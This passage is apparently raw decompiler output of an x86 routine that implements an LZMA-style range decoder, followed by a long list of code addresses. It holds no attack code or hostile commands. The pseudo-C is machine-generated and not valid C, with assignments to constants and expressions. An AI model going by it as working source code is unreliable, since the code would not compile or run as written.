								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                  0x00000000
                  0x004067be
                  0x004067be
                  0x004067c3
                  0x0040683a
                  0x00406841
                  0x0040684b
                  0x00406e2a
                  0x00406e2a
                  0x00406e2d
                  0x00406e2d
                  0x00406e33
                  0x00406e39
                  0x00406e3f
                  0x00406e59
                  0x00406e5c
                  0x00406e62
                  0x00406e6d
                  0x00406e6f
                  0x00406e41
                  0x00406e41
                  0x00406e50
                  0x00406e54
                  0x00406e54
                  0x00406e79
                  0x00406ea0
                  0x00406ea0
                  0x00406ea6
                  0x00406ea6
                  0x00000000
                  0x00406e7b
                  0x00406e7b
                  0x00406e7f
                  0x0040702e
                  0x00000000
                  0x0040702e
                  0x00406e8b
                  0x00406e92
                  0x00406e9a
                  0x00406e9d
                  0x00000000
                  0x00406e9d
                  0x004067c5
                  0x004067c5
                  0x004067c9
                  0x004067d1
                  0x004067d4
                  0x004067d6
                  0x004067d9
                  0x004067db
                  0x004067e0
                  0x004067e3
                  0x004067ea
                  0x004067f1
                  0x004067f4
                  0x004067ff
                  0x00406807
                  0x00406807
                  0x00406801
                  0x00406801
                  0x00406801
                  0x004067f6
                  0x004067f6
                  0x004067f6
                  0x0040680e
                  0x0040682c
                  0x0040682e
                  0x00406a01
                  0x00406a01
                  0x00406a04
                  0x00406a07
                  0x00406a0a
                  0x00406a0d
                  0x00406a10
                  0x00406a13
                  0x00406a16
                  0x00406a19
                  0x00406a1f
                  0x00406a37
                  0x00406a3a
                  0x00406a3d
                  0x00406a40
                  0x00406a40
                  0x00406a43
                  0x00406a49
                  0x00406a21
                  0x00406a21
                  0x00406a29
                  0x00406a2e
                  0x00406a30
                  0x00406a32
                  0x00406a32
                  0x00406a53
                  0x00406a56
                  0x004069f9
                  0x004069ff
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406a58
                  0x004069d4
                  0x004069d8
                  0x00406fe0
                  0x00000000
                  0x00406fe0
                  0x004069de
                  0x004069e1
                  0x004069e4
                  0x004069e8
                  0x004069eb
                  0x004069f1
                  0x004069f3
                  0x004069f3
                  0x004069f6
                  0x00000000
                  0x004069f6
                  0x00406810
                  0x00406810
                  0x00406813
                  0x00406819
                  0x0040681b
                  0x0040681b
                  0x0040681e
                  0x00406821
                  0x00406823
                  0x00406824
                  0x00406827
                  0x00406894
                  0x00406894
                  0x00406898
                  0x0040689b
                  0x0040689e
                  0x004068a1
                  0x004068a4
                  0x004068a5
                  0x004068a8
                  0x004068aa
                  0x004068b0
                  0x004068b3
                  0x004068b6
                  0x004068b9
                  0x004068bc
                  0x004068c2
                  0x004068de
                  0x004068e1
                  0x004068e4
                  0x004068e7
                  0x004068ee
                  0x004068f4
                  0x004068f8
                  0x004068c4
                  0x004068c4
                  0x004068c8
                  0x004068d0
                  0x004068d5
                  0x004068d7
                  0x004068d9
                  0x004068d9
                  0x00406902
                  0x00406905
                  0x0040687c
                  0x0040687c
                  0x00406882
                  0x00406935
                  0x0040693b
                  0x00000000
                  0x00000000
                  0x0040693d
                  0x00406940
                  0x00406943
                  0x00406946
                  0x00406949
                  0x0040694c
                  0x0040694f
                  0x00406952
                  0x00406955
                  0x0040695b
                  0x00406973
                  0x00406976
                  0x00406979
                  0x0040697c
                  0x0040697c
                  0x0040697f
                  0x00406985
                  0x0040695d
                  0x0040695d
                  0x00406965
                  0x0040696a
                  0x0040696c
                  0x0040696e
                  0x0040696e
                  0x0040698f
                  0x00406992
                  0x00406910
                  0x00406914
                  0x00406fd4
                  0x00000000
                  0x00406fd4
                  0x0040691a
                  0x0040691d
                  0x00406920
                  0x00406924
                  0x00406927
                  0x0040692d
                  0x0040692f
                  0x0040692f
                  0x00406932
                  0x00406932
                  0x00406992
                  0x00406999
                  0x00406999
                  0x00406999
                  0x0040699d
                  0x0040699d
                  0x004069a0
                  0x004069a3
                  0x004069a7
                  0x00406fec
                  0x00000000
                  0x00406fec
                  0x004069ad
                  0x004069b0
                  0x004069b3
                  0x004069b6
                  0x004069b9
                  0x004069bc
                  0x004069bf
                  0x004069c1
                  0x004069c4
                  0x004069c7
                  0x004069ca
                  0x004069cc
                  0x004069cc
                  0x004069cc
                  0x00406b69
                  0x00406b69
                  0x00406b6c
                  0x00406b6c
                  0x00000000
                  0x00406b6c
                  0x0040688e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040690b
                  0x00406857
                  0x0040685b
                  0x00406fc8
                  0x00407044
                  0x0040704c
                  0x00407053
                  0x00407055
                  0x0040705c
                  0x00407060
                  0x00407060
                  0x00406861
                  0x00406864
                  0x00406867
                  0x0040686b
                  0x0040686e
                  0x00406874
                  0x00406876
                  0x00406876
                  0x00406879
                  0x00000000
                  0x00406879
                  0x00406905
                  0x0040680e
                  0x00406642
                  0x00406642
                  0x0040664b
                  0x00407059
                  0x00407059
                  0x00000000
                  0x00407059
                  0x00406651
                  0x00000000
                  0x0040665c
                  0x00000000
                  0x00000000
                  0x00406665
                  0x00406668
                  0x0040666b
                  0x0040666f
                  0x00000000
                  0x00000000
                  0x00406675
                  0x00406678
                  0x0040667a
                  0x0040667b
                  0x0040667e
                  0x00406680
                  0x00406681
                  0x00406683
                  0x00406686
                  0x0040668b
                  0x00406690
                  0x00406699
                  0x004066ac
                  0x004066af
                  0x004066bb
                  0x004066e3
                  0x004066e5
                  0x004066f3
                  0x004066f3
                  0x004066f7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004066e7
                  0x004066e7
                  0x004066ea
                  0x004066eb
                  0x004066eb
                  0x00000000
                  0x004066e7
                  0x004066c1
                  0x004066c6
                  0x004066c6
                  0x004066cf
                  0x004066d7
                  0x004066da
                  0x00000000
                  0x004066e0
                  0x004066e0
                  0x00000000
                  0x004066e0
                  0x00000000
                  0x004066fd
                  0x004066fd
                  0x00406701
                  0x00406fad
                  0x00000000
                  0x00406fad
                  0x0040670a
                  0x0040671a
                  0x0040671d
                  0x00406720
                  0x00406720
                  0x00406720
                  0x00406723
                  0x00406727
                  0x00000000
                  0x00000000
                  0x00406729
                  0x0040672f
                  0x00406759
                  0x0040675f
                  0x00406766
                  0x00000000
                  0x00406766
                  0x00406735
                  0x00406738
                  0x0040673d
                  0x0040673d
                  0x00406748
                  0x00406750
                  0x00406753
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406798
                  0x0040679e
                  0x004067a1
                  0x004067ae
                  0x004067b6
                  0x00000000
                  0x00000000
                  0x0040676d
                  0x0040676d
                  0x00406771
                  0x00406fbc
                  0x00000000
                  0x00406fbc
                  0x0040677d
                  0x00406788
                  0x00406788
                  0x00406788
                  0x0040678b
                  0x0040678e
                  0x00406791
                  0x00406796
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406a5d
                  0x00406a61
                  0x00406a7f
                  0x00406a82
                  0x00406a89
                  0x00406a8c
                  0x00406a8f
                  0x00406a92
                  0x00406a95
                  0x00406a98
                  0x00406a9a
                  0x00406aa1
                  0x00406aa2
                  0x00406aa4
                  0x00406aa7
                  0x00406aaa
                  0x00406aad
                  0x00406aad
                  0x00406ab2
                  0x00000000
                  0x00406ab2
                  0x00406a63
                  0x00406a66
                  0x00406a69
                  0x00406a73
                  0x00000000
                  0x00000000
                  0x00406ac7
                  0x00406acb
                  0x00406aee
                  0x00406af1
                  0x00406af4
                  0x00406afe
                  0x00406acd
                  0x00406acd
                  0x00406ad0
                  0x00406ad3
                  0x00406ad6
                  0x00406ae3
                  0x00406ae6
                  0x00406ae6
                  0x00000000
                  0x00000000
                  0x00406b0a
                  0x00406b0e
                  0x00000000
                  0x00000000
                  0x00406b14
                  0x00406b18
                  0x00000000
                  0x00000000
                  0x00406b1e
                  0x00406b20
                  0x00406b24
                  0x00406b24
                  0x00406b27
                  0x00406b2b
                  0x00000000
                  0x00000000
                  0x00406b7b
                  0x00406b7f
                  0x00406b86
                  0x00406b89
                  0x00406b8c
                  0x00406b96
                  0x00000000
                  0x00406b96
                  0x00406b81
                  0x00000000
                  0x00000000
                  0x00406ba2
                  0x00406ba6
                  0x00406bad
                  0x00406bb0
                  0x00406bb3
                  0x00406ba8
                  0x00406ba8
                  0x00406ba8
                  0x00406bb6
                  0x00406bb9
                  0x00406bbc
                  0x00406bbc
                  0x00406bbf
                  0x00406bc2
                  0x00406bc5
                  0x00406bc5
                  0x00406bc8
                  0x00406bcf
                  0x00406bd4
                  0x00000000
                  0x00000000
                  0x00406c62
                  0x00406c62
                  0x00406c66
                  0x00407004
                  0x00000000
                  0x00407004
                  0x00406c6c
                  0x00406c6f
                  0x00406c72
                  0x00406c76
                  0x00406c79
                  0x00406c7f
                  0x00406c81
                  0x00406c81
                  0x00406c81
                  0x00406c84
                  0x00406c87
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406ce5
                  0x00406ce5
                  0x00406ce9
                  0x00407010
                  0x00000000
                  0x00407010
                  0x00406cef
                  0x00406cf2
                  0x00406cf5
                  0x00406cf9
                  0x00406cfc
                  0x00406d02
                  0x00406d04
                  0x00406d04
                  0x00406d04
                  0x00406d07
                  0x00000000
                  0x00000000
                  0x00406ab5
                  0x00406ab5
                  0x00406ab8
                  0x00000000
                  0x00000000
                  0x00406df4
                  0x00406df8
                  0x00406e1a
                  0x00406e1d
                  0x00406e27
                  0x00000000
                  0x00406e27
                  0x00406dfa
                  0x00406dfd
                  0x00406e01
                  0x00406e04
                  0x00406e04
                  0x00406e07
                  0x00000000
                  0x00000000
                  0x00406eb1
                  0x00406eb5
                  0x00406ed3
                  0x00406ed3
                  0x00406ed3
                  0x00406eda
                  0x00406ee1
                  0x00406ee8
                  0x00406ee8
                  0x00000000
                  0x00406ee8
                  0x00406eb7
                  0x00406eba
                  0x00406ebd
                  0x00406ec0
                  0x00406ec7
                  0x00406e0b
                  0x00406e0b
                  0x00406e0e
                  0x00000000
                  0x00000000
                  0x00406fa2
                  0x00406fa5
                  0x00000000
                  0x00000000
                  0x00406bdc
                  0x00406bde
                  0x00406be5
                  0x00406be6
                  0x00406be8
                  0x00406beb
                  0x00000000
                  0x00000000
                  0x00406bf3
                  0x00406bf6
                  0x00406bf9
                  0x00406bfb
                  0x00406bfd
                  0x00406bfd
                  0x00406bfe
                  0x00406c01
                  0x00406c08
                  0x00406c0b
                  0x00406c19
                  0x00000000
                  0x00000000
                  0x00406eef
                  0x00406eef
                  0x00406ef2
                  0x00406ef9
                  0x00000000
                  0x00000000
                  0x00406efe
                  0x00406efe
                  0x00406f02
                  0x0040703a
                  0x00000000
                  0x0040703a
                  0x00406f08
                  0x00406f0b
                  0x00406f0e
                  0x00406f12
                  0x00406f15
                  0x00406f1b
                  0x00406f1d
                  0x00406f1d
                  0x00406f1d
                  0x00406f20
                  0x00406f23
                  0x00406f23
                  0x00406f23
                  0x00406f23
                  0x00406f26
                  0x00406f26
                  0x00406f2a
                  0x00406f8a
                  0x00406f8d
                  0x00406f92
                  0x00406f93
                  0x00406f95
                  0x00406f97
                  0x00406f9a
                  0x00000000
                  0x00406f9a
                  0x00406f2c
                  0x00406f32
                  0x00406f35
                  0x00406f38
                  0x00406f3b
                  0x00406f3e
                  0x00406f41
                  0x00406f44
                  0x00406f47
                  0x00406f4a
                  0x00406f4d
                  0x00406f66
                  0x00406f69
                  0x00406f6c
                  0x00406f6f
                  0x00406f73
                  0x00406f75
                  0x00406f75
                  0x00406f76
                  0x00406f79
                  0x00406f4f
                  0x00406f4f
                  0x00406f57
                  0x00406f5c
                  0x00406f5e
                  0x00406f61
                  0x00406f61
                  0x00406f7c
                  0x00406f83
                  0x00000000
                  0x00406f85
                  0x00000000
                  0x00406f85
                  0x00000000
                  0x00406c21
                  0x00406c24
                  0x00406c5a
                  0x00406d8a
                  0x00406d8a
                  0x00406d8a
                  0x00406d8a
                  0x00406d8d
                  0x00406d8d
                  0x00406d90
                  0x00406d92
                  0x0040701c
                  0x00000000
                  0x0040701c
                  0x00406d98
                  0x00406d9b
                  0x00000000
                  0x00000000
                  0x00406da1
                  0x00406da5
                  0x00406da8
                  0x00406da8
                  0x00406da8
                  0x00000000
                  0x00406da8
                  0x00406c26
                  0x00406c28
                  0x00406c2a
                  0x00406c2c
                  0x00406c2f
                  0x00406c30
                  0x00406c32
                  0x00406c34
                  0x00406c37
                  0x00406c3a
                  0x00406c50
                  0x00406c55
                  0x00406c8d
                  0x00406c8d
                  0x00406c91
                  0x00406cbd
                  0x00406cbf
                  0x00406cc6
                  0x00406cc9
                  0x00406ccc
                  0x00406ccc
                  0x00406cd1
                  0x00406cd1
                  0x00406cd3
                  0x00406cd6
                  0x00406cdd
                  0x00406ce0
                  0x00406d0d
                  0x00406d0d
                  0x00406d10
                  0x00406d13
                  0x00406d87
                  0x00406d87
                  0x00406d87
                  0x00000000
                  0x00406d87
                  0x00406d15
                  0x00406d1b
                  0x00406d1e
                  0x00406d21
                  0x00406d24
                  0x00406d27
                  0x00406d2a
                  0x00406d2d
                  0x00406d30
                  0x00406d33
                  0x00406d36
                  0x00406d4f
                  0x00406d51
                  0x00406d54
                  0x00406d55
                  0x00406d58
                  0x00406d5a
                  0x00406d5d
                  0x00406d5f
                  0x00406d61
